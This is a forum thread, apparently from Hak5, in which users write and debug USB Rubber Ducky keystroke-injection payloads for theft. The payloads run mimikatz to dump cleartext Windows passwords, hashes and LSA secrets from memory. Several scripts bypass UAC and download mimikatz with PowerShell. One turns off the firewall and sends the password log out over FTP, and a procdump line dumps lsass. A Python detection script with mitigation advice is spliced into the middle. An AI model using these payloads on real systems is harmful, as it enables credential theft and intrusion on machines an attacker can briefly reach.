redmeatuk, posted June 14, 2013 (edited)

Hello all,

This is a Ducky script I knocked up to use the wonderful mimikatz tool. This tool allows you to dump hashes, including the clear-text passwords for wdigest, from memory.

http://blog.gentilkiwi.com/securite/mimikatz/minidump
http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

Requirements:
- Webserver to host the mimikatz binary for your architecture (I tested this on Windows 7 Home Premium 64-bit); you need the ones in the 'alpha' subfolder of the zip/7z file for your architecture
- Local user needs to be an administrator account / have admin privs

What does it do?
1. It spawns a command shell with administrator privileges
2. It downloads mimikatz from a webserver using PowerShell
3. It uses mimikatz to dump wdigest passwords from memory
4. It cleans up by deleting the binaries it downloaded

It could be improved by using sneaky data exfil techniques to transfer the data encrypted offsite, e.g. socat, ncat SSL, stunnel etc. If you have a firmware installed that lets you store files you could copy the output to the SD card. Also the mimikatz file could be encoded and run through PowerShell to generate the executable instead of 'wget'ing the file. You may need to adjust timings in this script to play nice on your machine(s).
Script:

REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs)
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<replace me with webserver ip/host>/mimikatz.exe','%TEMP%\mimikatz.exe')
DELAY 300
ENTER
DELAY 3000
STRING %TEMP%\mimikatz.exe
DELAY 300
ENTER
DELAY 3000
STRING privilege::debug
DELAY 300
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER
DELAY 1000
STRING exit
DELAY 300
ENTER
DELAY 100
STRING del %TEMP%\mimikatz.exe
DELAY 300
ENTER

Thanks for reading :)

Aaron

Edited June 29, 2013 by redmeatuk
rcancel76, posted June 21, 2013

Does this dump all pw's or just Windows pw's?
redmeatuk, posted June 23, 2013 (edited)

AFAIK it dumps passwords for the currently logged in user. Mimikatz only works with Windows.

Update - I see that you do not require SYSTEM privileges to get this to work, you just need to launch cmd.exe with administrator privileges and then run the mimikatz commands. I've amended the script.

Edited June 23, 2013 by redmeatuk
shutin, posted June 30, 2013

WOW! mimikatz is amazing! I'm surprised this isn't more widely known. Everyone is so busy worrying about cracking Windows hashes and whatnot when they could be just doing this instead. mimikatz is like reaver compared to trying to brute force WPA keys. It just spits it out in plaintext!

I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this:

procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp

The beauty here is that procdump will not get flagged by AV like mimikatz already is (6/xx on virustotal already) because it's an official Microsoft utility! All we need is to have the ducky run procdump and put the file on the duck and then we can run mimikatz on it later on our own PC. How come everyone always wants the duck to grab things from the internet? We have the capability to save files on the ducky so why not use that instead? I'm going to try and come up with a payload that simply saves a procdump file to the ducky and I'll post it here.
odnorazovaya, posted June 30, 2013

> WOW! mimikatz is amazing! I'm surprised this isn't more widely known. Everyone is so busy worrying about cracking Windows hashes and whatnot when they could be just doing this instead. mimikatz is like reaver compared to trying to brute force WPA keys. It just spits it out in plaintext!
>
> I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this:
>
> procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
>
> The beauty here is that procdump will not get flagged by AV like mimikatz already is (6/xx on virustotal already) because it's an official Microsoft utility! All we need is to have the ducky run procdump and put the file on the duck and then we can run mimikatz on it later on our own PC. How come everyone always wants the duck to grab things from the internet? We have the capability to save files on the ducky so why not use that instead? I'm going to try and come up with a payload that simply saves a procdump file to the ducky and I'll post it here.

Sounds promising, looking forward to seeing it in action.
shutin, posted June 30, 2013

Woo! Finally posting my own working payload! Thanks to overwraith and redmeatuk for their base code that I just tied together. This basically does exactly what redmeatuk's code does except you won't need an internet connection.

Requirements:
1) Twin Duck firmware or whatever it's called that lets you have USB storage as well as firing inject.bin upon insertion.
2) mimikatz.exe (either 32-bit or 64-bit depending on target environment) placed at the root of that DUCKY drive (drive name MUST be "DUCKY"). Get it here: http://blog.gentilkiwi.com/mimikatz and use the exe from the "alpha" subdirectory

Notes: I tried to do it with procdump but it takes a LONG time to write out the 36 meg output file to the card and the window for procdump basically freezes and you have to forcibly kill it. You could probably write the .dmp file to a local disk and then copy it to the ducky but it's still going to take a while. I don't think that many AV programs are looking for mimikatz so it's fairly safe. This script could be optimized a little, it's a bit slow and it leaves two windows open. You want to leave the mimikatz window open though because after this f$#%^$ker executes you'll be staring at plaintext passwords for the logged on users!@!$#@

REM Author: shutin who just tied two other authors together:
REM overwraith for the exe running stuff and redmeatuk who brought mimikatz to the party
REM Name: Runmimikatz.txt
DEFAULT_DELAY 75
DELAY 3000
REM get a cmd prompt this way because it's admin and we need that for mimikatz
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
REM the admin part booyah
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat contents
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto while1
ENTER
STRING :break
ENTER
REM
REM FINALLY ACTUALLY RUN AN EXE
STRING START %myd%\mimikatz.exe
ENTER
CONTROL z
ENTER
STRING DuckyWait.bat
ENTER
DELAY 1000
ENTER
DELAY 3000
STRING privilege::debug
DELAY 300
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER
redmeatuk, posted July 1, 2013

There was certainly room for improvement, nice work shutin ;)
redmeatuk, posted July 1, 2013

Looks like mimikatz will even work with 'encrypted' Windows 8/8.1 passwords - https://twitter.com/gentilkiwi/status/351438778231033856/photo/1

This tool rocks!
shutin, posted July 5, 2013

> There was certainly room for improvement, nice work shutin ;)

Thanks! Mimikatz is a weird tool. Is there any way to get it to spit output into a text file? It's mostly in French so it's a bit hard to understand. There is also no "help". I really want to get my version to dump the output back to the ducky drive instead of just displaying the console window.

> Looks like mimikatz will even work with 'encrypted' Windows 8/8.1 passwords - https://twitter.com/gentilkiwi/status/351438778231033856/photo/1
>
> This tool rocks!

But will it work if the password is one of those cloud passwords? I had trouble trying to extract those because I think they are stored online.
redmeatuk, posted July 6, 2013 (edited)

I've not seen any switches or examples of how to get mimikatz to output to a file; there may be an equivalent of script/tee on Windows. This works, but you will not see any output, as standard error and output will be redirected to a text file of your choosing, e.g.:

mimikatz.exe > output.txt 2>&1

Then just issue your commands as normal and exit.

Cloud passwords? Not sure, give it time though, I'm sure someone will figure it all out :)

Edited July 6, 2013 by redmeatuk
redmeatuk, posted July 6, 2013

I wasn't aware that mimikatz is now in meterpreter! The meterpreter session needs to be running with SYSTEM privileges. Once you have a meterpreter shell you can run the following commands:

load mimikatz
wdigest
DyFukA, posted August 31, 2013 (edited)

Hello, for those of you that want a text file output on Windows and FTP upload:

DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 2000
CTRL-SHIFT ENTER
DELAY 2000
STRING netsh firewall set opmode disable
DELAY 500
ENTER
DELAY 500
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://mimikatz.exe,%TEMP%\mimikatz.exe')
ENTER
DELAY 4000
STRING cd %temp%
DELAY 300
ENTER
DELAY 500
STRING mimikatz.exe > pwlog.txt & type pwlog.txt
DELAY 300
ENTER
DELAY 1000
STRING privilege::debug
DELAY 300
ENTER
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER
DELAY 500
STRING exit
DELAY 300
ENTER
DELAY 100
STRING del %TEMP%\mimikatz.exe
DELAY 300
ENTER
STRING move pwlog.txt c:\
ENTER
DELAY 300
STRING ftp yoursite.com
ENTER
DELAY 1000
STRING youruser
ENTER
DELAY 1000
STRING yourpass
ENTER
DELAY 1000
STRING lcd c:\
ENTER
DELAY 800
STRING put pwlog.txt
ENTER
DELAY 500
STRING quit
ENTER
DELAY 300
STRING del c:\pwlog.txt
ENTER

Edited August 31, 2013 by DyFukA
Darren Kitchen, posted August 31, 2013

Fantastic contribution. Here's a version I whipped up that uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from the DUCKY SD card and save the password log file to disk.

REM Author: Hak5Darren based on code from redmeatuk, shutin, DyFukA
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x64 (target win32 with 32-bit binary)
REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz_alpha_x64.exe > %duck%\%computername%-passwords.txt
ENTER
DELAY 100
STRING privilege::debug
ENTER
STRING sekurlsa::logonPasswords full
ENTER
REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER
b00stfr3ak, posted September 1, 2013

lsass dump through PowerShell and pushed to a remote server: https://github.com/b00stfr3ak/ducky_lsass_dump

Just run mimikatz on the same type of system and you are golden.
Darren Kitchen, posted September 10, 2013

Here's an updated version using a recommendation from Mubix that should speed it up ever so slightly.

REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x64 (target win32 with 32-bit binary)
REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
ENTER
REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER
DyFukA, posted September 10, 2013

Just flashed to Twin Duck firmware and ran it, works great!
Darren Kitchen, posted September 11, 2013

A comment from YouTube on the latest episode featuring the payload suggests OS / CPU detection.

> sendforththegunboats: You could improve this further by detecting your OS architecture using the %processor_architecture% variable then running the specific command based on the output. The same could be done with ver to figure out if it's NT5 or NT6 and run the appropriate version of mimikatz.

Any takers?
mypyramorhinx, posted October 8, 2013 (edited)

So, noob question here. I can't seem to get mimikatz to run after insertion. I have copied Darren's code from above, but for some reason it exits prior to executing the .exe file. I modified his a bit, maybe someone can look at this.

REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x86
REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 1000
REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
ENTER
REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER

I changed the %duck%mimikatz_alpha_x64.exe to just be mimikatz.exe. That should work, right? I copied the alpha/win32/mimikatz.exe over but it still doesn't seem to run. It seems to simply skip over this and exit. Any ideas?

Edited October 9, 2013 by mypyramorhinx
mypyramorhinx, posted October 11, 2013

No one wants to help me out here? I can't seem to get this to work. The other problem that I have, well part of this problem, is that the mimikatz application is not named as it is listed here in the ducky code. It is simply named mimikatz.exe. I know to take the program from the right folder, but I seem to be at a standstill. Anyone out there that can help with this payload?
hzm74, posted November 8, 2013

> Here's an updated version using a recommendation from Mubix that should speed it up ever so slightly.
>
> REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
> REM Description: Dump local wdigest passwords from memory using mimikatz
> REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from
> REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
> REM Target: Windows 7 x64 (target win32 with 32-bit binary)
> REM *** UAC Bypass ***
> DELAY 2000
> WINDOWS r
> DELAY 200
> STRING powershell Start-Process cmd.exe -Verb runAs
> ENTER
> DELAY 2000
> ALT y
> DELAY 500
> REM *** Define DUCKY drive as %duck%
> STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
> ENTER
> DELAY 500
> REM *** Execute mimikatz from SD card and save log file to disk ***
> STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
> ENTER
> REM *** GTFO ***
> STRING exit
> ENTER
> STRING exit
> ENTER

This gives me the following error:

mimikatz(commandline) # privilege::debug"sekurlsa::logonPasswordssamdump::hashes
ERROR mimikatz_doLocal ; "debug"sekurlsa::logonPasswordssamdump::hashes" command of "privilege" module not found !

Module : privilege
Full name : Privilege module

debug - Ask debug privilege

LOOK AT: ::logonPasswordssamdump

I have missing spaces in my command line. This line:

STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt

doesn't create spaces in the command line between debug" "sekurlsa and full" "samdump

PLEASE HELP. Seems simple?!
gentilkiwi, posted January 5, 2014

If you cd %duck% before, you can use:

mimikatz privilege::debug log sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit

mimikatz privilege::debug "log filename.log" sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit

mimikatz privilege::debug sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit > filename.log
gentilkiwi, posted August 24, 2014

Hi everybody

After the gift from Darren @ Defcon, I have now made my own key ;) - I use cm_duck.hex

Enjoy my script, and let me know if any improvement is needed (be nice, it's my first one)

DELAY 2000
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb RunAs
ENTER
DELAY 1500
ALT o
DELAY 250
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "MIMIKEY"') do set MIMIKEY=%d
ENTER
DELAY 500
STRING cd /d %MIMIKEY%\
ENTER
DELAY 500
STRING mimikatz_%PROCESSOR_ARCHITECTURE% "log %computername%.log" version privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys vault::cred vault::list token::elevate lsadump::sam lsadump::secrets vault::cred vault::list answer exit
ENTER
DELAY 500
STRING exit
ENTER

You only need at the root of the key:

mimikatz_x86.exe
mimikatz_amd64.exe

mimikatz will create a %computername%.log at the root of the key ;) It's faster than redirection.
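A defender-side counterpart to the command lines posted through this thread (redmeatuk's PowerShell download, shutin's and Darren's `wmic volume ... findstr "DUCKY"` drive lookup, Darren's `Start-Process cmd.exe -Verb runAs`, DyFukA's `netsh firewall` change, shutin's procdump line and gentilkiwi's `mimikatz_%PROCESSOR_ARCHITECTURE%` one-liner): an added Python example, not code from any poster, that runs simple command-line rules over constructed process-creation records and rates each host by how many distinct stages appear. The record layout, host names, user names, paths and the 198.51.100.7 address are made up for this example.

```python
import re
from typing import Dict, List

# Constructed process-creation records in a flat "host|user|parent|image|cmdline"
# layout standing in for Sysmon Event ID 1 / Security 4688 data. Hosts, users,
# paths and the 198.51.100.7 address are made up for this example.
SAMPLE_EVENTS = [
    r"WS01|alice|explorer.exe|cmd.exe|cmd",
    r"WS01|alice|cmd.exe|powershell.exe|powershell Start-Process cmd.exe -Verb runAs",
    r"WS01|alice|cmd.exe|powershell.exe|powershell (new-object System.Net.WebClient).DownloadFile('http://198.51.100.7/mimikatz.exe','C:\Users\alice\AppData\Local\Temp\mimikatz.exe')",
    r"WS01|alice|cmd.exe|WMIC.exe|wmic volume get driveletter, label",
    r'WS01|alice|cmd.exe|findstr.exe|findstr "DUCKY"',
    r'WS01|alice|cmd.exe|mimikatz_alpha_x64.exe|E:\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit',
    r"WS02|bob|cmd.exe|netsh.exe|netsh firewall set opmode disable",
    r"WS02|bob|cmd.exe|procdump.exe|procdump.exe -accepteula -ma lsass.exe WS02_lsass.dmp",
    r"WS03|carol|explorer.exe|powershell.exe|powershell Get-Process | Out-File procs.txt",
    r"WS03|carol|cmd.exe|findstr.exe|findstr /i error app.log",
    r"WS04|dave|cmd.exe|WMIC.exe|wmic volume get driveletter, label",
]

# Each rule names one stage seen in the thread's payloads. findstr on its own is
# deliberately not a rule: it is far too common to be evidence of anything.
RULES = [
    ("mimikatz_module_command", re.compile(r"\b(privilege|sekurlsa|lsadump|samdump|token|vault)::\w+", re.I)),
    ("mimikatz_binary_name", re.compile(r"mimikatz[\w-]*\.exe|\bmimikatz_(x86|amd64)\b", re.I)),
    ("powershell_webclient_download", re.compile(r"System\.Net\.WebClient.*DownloadFile", re.I)),
    ("powershell_runas_cmd", re.compile(r"Start-Process\s+cmd(\.exe)?\s+-Verb\s+runAs", re.I)),
    ("volume_label_lookup", re.compile(r"wmic\s+volume\s+get\s+driveletter", re.I)),
    ("firewall_disabled", re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable", re.I)),
    ("lsass_memory_dump", re.compile(r"procdump.*-ma\s+lsass", re.I)),
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one flat record; maxsplit=4 keeps any '|' inside the command line."""
    host, user, parent, image, cmdline = line.split("|", 4)
    return {"host": host, "user": user, "parent": parent, "image": image, "cmdline": cmdline}


def match_rules(cmdline: str) -> List[str]:
    """Names of every rule whose pattern occurs in the command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_events(lines: List[str]) -> List[Dict[str, object]]:
    """Return the parsed records that matched at least one rule, with the rule names attached."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        names = match_rules(ev["cmdline"])
        if names:
            hits.append({**ev, "rules": names})
    return hits


def rate_hosts(hits: List[Dict[str, object]]) -> Dict[str, str]:
    """A host with two or more distinct stages is 'high'; one lone indicator is only 'medium'."""
    stages: Dict[str, set] = {}
    for h in hits:
        stages.setdefault(str(h["host"]), set()).update(h["rules"])
    return {host: ("high" if len(s) >= 2 else "medium") for host, s in stages.items()}


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for h in found:
        print(f'{h["host"]:5} {h["user"]:6} {", ".join(h["rules"]):50} {str(h["cmdline"])[:60]}')
    print(rate_hosts(found))
```

On real telemetry the same rules would run over Sysmon Event ID 1 or Security 4688 command lines (4688 only carries the command line when command-line auditing is enabled). A lone `wmic volume get driveletter` is weak evidence, which is why WS04 only rates medium while WS01 and WS02, where several stages co-occur, rate high. The durable fix for the wdigest part of this thread is to stop LSASS keeping clear-text credentials at all: the WDigest `UseLogonCredential` registry value set to 0, which KB2871997 added for Windows 7 and 8 and which Windows 8.1 / Server 2012 R2 and later apply by default.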
zardoz, posted August 25, 2014

> Hi everybody
>
> After the gift from Darren @ Defcon, I have now made my own key ;) - I use cm_duck.hex
>
> Enjoy my script, and let me know if any improvement is needed (be nice, it's my first one)
>
> DELAY 2000
> GUI r
> DELAY 500
> STRING powershell Start-Process cmd -Verb RunAs
> ENTER
> DELAY 1500
> ALT o
> DELAY 250
> STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "MIMIKEY"') do set MIMIKEY=%d
> ENTER
> DELAY 500
> STRING cd /d %MIMIKEY%\
> ENTER
> DELAY 500
> STRING mimikatz_%PROCESSOR_ARCHITECTURE% "log %computername%.log" version privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys vault::cred vault::list token::elevate lsadump::sam lsadump::secrets vault::cred vault::list answer exit
> ENTER
> DELAY 500
> STRING exit
> ENTER
>
> You only need at the root of the key:
>
> mimikatz_x86.exe
> mimikatz_amd64.exe
>
> mimikatz will create a %computername%.log at the root of the key ;) It's faster than redirection.

Hello, thank you for your script. But I have an issue (I am a newbie..). In your script you are writing "ALT o" but I don't know what it means, and it doesn't do anything on my computer (France/Belgium). So when the script is processing, it just writes "o" on the terminal. Can you help me? Thanks!

C:\Users\XXX>ofor /f %d in ('wmic volume get driveletter^, label ^| findstr "DUC KY"') do set DUCKY=%d
'ofor' is not recognized as an internal or external command,
operable program or batch file.
gentilkiwi, posted August 25, 2014

'ALT o' is to bypass UAC in French ;), replace it with 'y' for English. If no UAC, you can remove it ;)
zardoz, posted August 25, 2014

> 'ALT o' is to bypass UAC in French ;), replace it with 'y' for English. If no UAC, you can remove it ;)

Ooh, right, I had forgotten you are French. :) But it's not working on my PC (French too), so it just writes "o" on the cmd, so the next command line is broken:

for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUC KY"') do set DUCKY=%d

becomes

ofor /f %d in ('wmic volume get driveletter^, label ^| findstr "DUC KY"') do set DUCKY=%d

Do you mean ALT GR "o"?